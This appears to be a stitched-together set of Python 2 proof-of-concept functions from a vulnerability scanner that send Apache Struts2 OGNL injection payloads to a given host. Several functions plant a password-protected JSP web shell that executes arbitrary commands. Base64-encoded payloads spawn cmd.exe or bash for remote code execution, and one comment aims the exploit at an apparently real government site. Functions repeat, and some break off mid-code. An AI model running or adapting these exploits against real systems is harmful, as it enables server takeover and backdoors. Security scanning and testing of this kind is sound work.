def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"
#print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
if productname.has_key('cookie'):
headers['Cookie'] = productname['cookie']
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789"
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackresults=''):
target_url=''
target_url = 'http://' + ip + ':' + port
if productname.get('path',''):
target_url = 'http://'+ip+':'+port+productname.get('path','')
else:
from script import linktool
listarray=linktool.getaction(target_url)
if len(listarray)>0:
target_url=listarray[0]
else:
target_url = 'http://'+ip+':'+port+'/login.action'
result = {}
timeout=3
result['result']=False
res=None
# 'redirect:${#req=#context.get(\'co\'+\'m.open\'+\'symphony.xwo\'+\'rk2.disp\'+\'atcher.HttpSer\'+\'vletReq\'+\'uest\'),#resp=#context.get(\'co\'+\'m.open\'+\'symphony.xwo\'+\'rk2.disp\'+\'atcher.HttpSer\'+\'vletRes\'+\'ponse\'),#resp.setCharacterEncoding(\'UTF-8\'),#resp.getWriter().print("web"),#resp.getWriter().print("path88888887:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()}'
payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22pathstructs12345678:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=60)
res_html = r.text
except Exception,e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}"
print target_url
try:
headers = {"Content-Type": payload}
r = requests.get(target_url, headers=headers, timeout=5)
res_html = r.text
except Exception, e:
print e
return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
payload = "method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" #
print target_url
try:
headers = {"Content-Type":"application/x-www-form-urlencoded"}
r = requests.post(target_url,data=payload,headers=headers,timeout=5)
res_html = r.text
except Exception,e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
'0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
'29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
'%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
'.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
'%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
'0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
'22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
poc_url = "{url}?method:%23_memberAccess%[email protected]" \
"@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
"%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
"%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
"fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
"meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
"xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
"b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
"x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
"content}".format(url=target_url, filename=jsp_file, content=content)
print target_url
try:
res = urllib2.urlopen(poc_url, timeout=timeout)
res_html = res.read()
except Exception, e:
print e
return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
'0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
'29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
'%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
'.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
'%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
'0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
'22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
poc_url = "{url}?method:%23_memberAccess%[email protected]" \
"@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
"%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
"%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
"fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
"meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
"xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
"b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
"x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
"content}".format(url=target_url, filename=jsp_file, content=content)
print target_url
try:
res=urllib2.urlopen(poc_url,timeout=timeout)
res_html = res.read()
except Exception,e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='80',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
#payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
command = 'echo test60253718'
payload_l = base64.decodestring(
u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc='
)
payload_r = base64.decodestring(
u'JykuKCNpc3dpbj0oQGphdmEubGFuZy5TeXN0ZW1AZ2V0UHJvcGVydHkoJ29zLm5hbWUnKS50b0xvd2VyQ2FzZSgpLmNvbnRhaW5zKCd3aW4nKSkpLigjY21kcz0oI2lzd2luP3snY21kLmV4ZScsJy9jJywjY21kfTp7Jy9iaW4vYmFzaCcsJy1jJywjY21kfSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI3JvcykpLigjcm9zLmZsdXNoKCkpfQ=='
)
end_null_byte = '0063'.decode('hex')
payload = payload_l + command + payload_r + end_null_byte
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
if productname.has_key('cookie'):
headers['Cookie'] = productname['cookie']
files = {'upload': (payload, 'Kaboom', 'text/plain')}
r = requests.post(target_url, files=files, headers=headers)
res_html = r.content
except Exception, e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='',
productname={},
keywords='',
hackresults=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
s = None
try:
randint1 = str(random.randint(1000, 10000))
payload = self.make_s2_046_payload('echo X-Test-' + randint1)
temp_result = self.exec_s2_046_payload(target_url, payload)
if 'X-Test-%s' % (randint1) in temp_result:
info = target_url + "struts046 Vul"
result['result'] = True
result['VerifyInfo'] = {}
result['VerifyInfo']['type'] = 'struts046 Vul'
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['payload'] = payload
result['VerifyInfo']['result'] = info
result['VerifyInfo']['level'] = '高危(HOLE)'
return result
except Exception, e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='80',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
content = str(random.randint(1000, 1000000))
poc_url = "{url}?debug=browser&object=(%23mem=%[email protected]" \
"gnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameter" \
"s.rpsobj[0]].getWriter().println(%23parameters.content[0]):" \
"xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher." \
"HttpServletResponse&content={content}".format(url=target_url, content=content)
#print target_url
try:
req = urllib2.Request(poc_url)
if productname.has_key('cookie'):
req.add_header('Cookie', productname['cookie'])
#res=urllib2.urlopen(poc_url,timeout=timeout)
res = urllib2.urlopen(req, timeout=timeout)
res_html = res.read()
except Exception, e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='80',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"
#print target_url
try:
headers = {"Content-Type": "application/x-www-form-urlencoded"}
if productname.has_key('cookie'):
headers['Cookie'] = productname['cookie']
r = requests.post(target_url,
data=payload,
headers=headers,
timeout=5)
res_html = r.text
except Exception, e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='80',
productname={},
keywords='',
hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 3
result['result'] = False
res = None
payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}"
try:
headers = {}
headers[
'User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
headers['Content-Type'] = payload
if productname.has_key('cookie'):
headers['Cookie'] = productname['cookie']
r = requests.get(target_url, headers=headers)
res_html = r.content
except Exception, e:
print e
return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
s=None
try:
randint1 = str(random.randint(1000, 10000))
payload = self.make_s2_046_payload('echo X-Test-'+randint1)
temp_result = self.exec_s2_046_payload(target_url, payload)
if 'X-Test-%s' % (randint1) in temp_result:
info = target_url + "struts046 Vul"
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='struts046 Vul'
result['VerifyInfo']['URL'] =target_url
result['VerifyInfo']['payload']=payload
result['VerifyInfo']['result'] =info
return result
except Exception,e:
print e
return result
def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get('path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout=3
result['result']=False
res=None
#payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
command = 'echo test60253718'
payload_l = base64.decodestring(u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc=')
payload_r = base64.decodestring(u'JykuKCNpc3dpbj0oQGphdmEubGFuZy5TeXN0ZW1AZ2V0UHJvcGVydHkoJ29zLm5hbWUnKS50b0xvd2VyQ2FzZSgpLmNvbnRhaW5zKCd3aW4nKSkpLigjY21kcz0oI2lzd2luP3snY21kLmV4ZScsJy9jJywjY21kfTp7Jy9iaW4vYmFzaCcsJy1jJywjY21kfSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI3JvcykpLigjcm9zLmZsdXNoKCkpfQ==')
end_null_byte = '0063'.decode('hex')
payload = payload_l + command + payload_r + end_null_byte
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
if productname.has_key('cookie'):
headers['Cookie'] = productname['cookie']
files = {
'upload': (payload, 'Kaboom', 'text/plain')
}
r = requests.post(target_url, files=files, headers=headers)
res_html = r.content
except Exception,e:
print e
return result
def verify(self,
head='',
context='',
ip='',
port='',
productname={},
keywords='',
hackresults=''):
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
timeout = 3
res = None
res_html = None
check_url = self.check_vul(target_url)
result = {}
result['result'] = False
try:
headers = {"Content-Type": "application/x-www-form-urlencoded"}
r = requests.get(check_url, headers=headers, timeout=5)
res_html = r.text
except Exception, e:
print e
return result
finally:
def verify(self,
head='',
context='',
ip='',
port='',
productname={},
keywords='',
hackresults=''):
target_url = ''
target_url = 'http://' + ip + ':' + port
if productname.get('path', ''):
target_url = 'http://' + ip + ':' + port + productname.get(
'path', '')
else:
from script import linktool
listarray = linktool.getaction(target_url)
if len(listarray) > 0:
target_url = listarray[0]
else:
target_url = 'http://' + ip + ':' + port + '/login.action'
result = {}
timeout = 10
result['result'] = False
res = None
jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
# gif89a<% if("024".equals(request.getParameter("pwd"))){
# java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();
# int a = -1;
# byte[] b = new byte[2048];
# out.print("<pre>");
# while((a=in.read(b))!=-1){
# out.println(new String(b));
# }
# out.print(</pre>");
# }
# %>
content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
'0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
'29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
'%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
'.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
'%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
'0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
'22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
poc_url = "{url}?method:%23_memberAccess%[email protected]" \
"@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
"%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
"%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
"fos%3dnew:java.io.FileOutputStream(%23b),%23fos.write(%23para" \
"meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
"xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
"b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
"x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
"er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
"content}".format(url=target_url, filename=jsp_file, content=content)
# 'http://www.dcqjw.gov.cn:80/sflogin_usercenter.action?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#a=#parameters.reqobj[0],#c=#parameters.reqobj[1],#req=#context.get(#a),#b=#req.getRealPath(#c)+#parameters.reqobj[2],#fos=new:java.io.FileOutputStream(#b),#fos.write(#parameters.content[0].getBytes()),#fos.close(),#hh=#context.get(#parameters.rpsobj[0]),#hh.getWriter().println(#b),#hh.getWriter().flush(),#hh.getWriter().close(),1?#xx:#request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=/&reqobj=32203.jsp&content=gif89a<%\n if("024".equals(request.getParameter("pwd"))){\n java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();\n int a = -1;\n byte[] b = new byte[2048];\n out.print("<pre>");\n while((a=in.read(b))!=-1){\n out.println(new String(b));\n }\n out.print("</pre>");\n }\n%>'
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
headers = {'User-Agent': user_agent}
# print target_url
try:
res = urllib2.urlopen(poc_url, timeout=timeout)
res_html = res.read()
except (IOError, httplib.HTTPException):
# print traceback.print_exc()
return result
finally:
if res is not None:
res.close()
del res
if jsp_file in res_html:
cprint(target_url + '存在structs2032漏洞', 'red')
info = target_url + "struts2032 Vul"
result['result'] = True
result['VerifyInfo'] = {}
result['VerifyInfo']['type'] = 'struts2032 Vul'
result['VerifyInfo']['URL'] = target_url
result['VerifyInfo']['payload'] = poc_url
result['VerifyInfo']['result'] = info
result['VerifyInfo']['level'] = '高危(HOLE)'
return result
return result
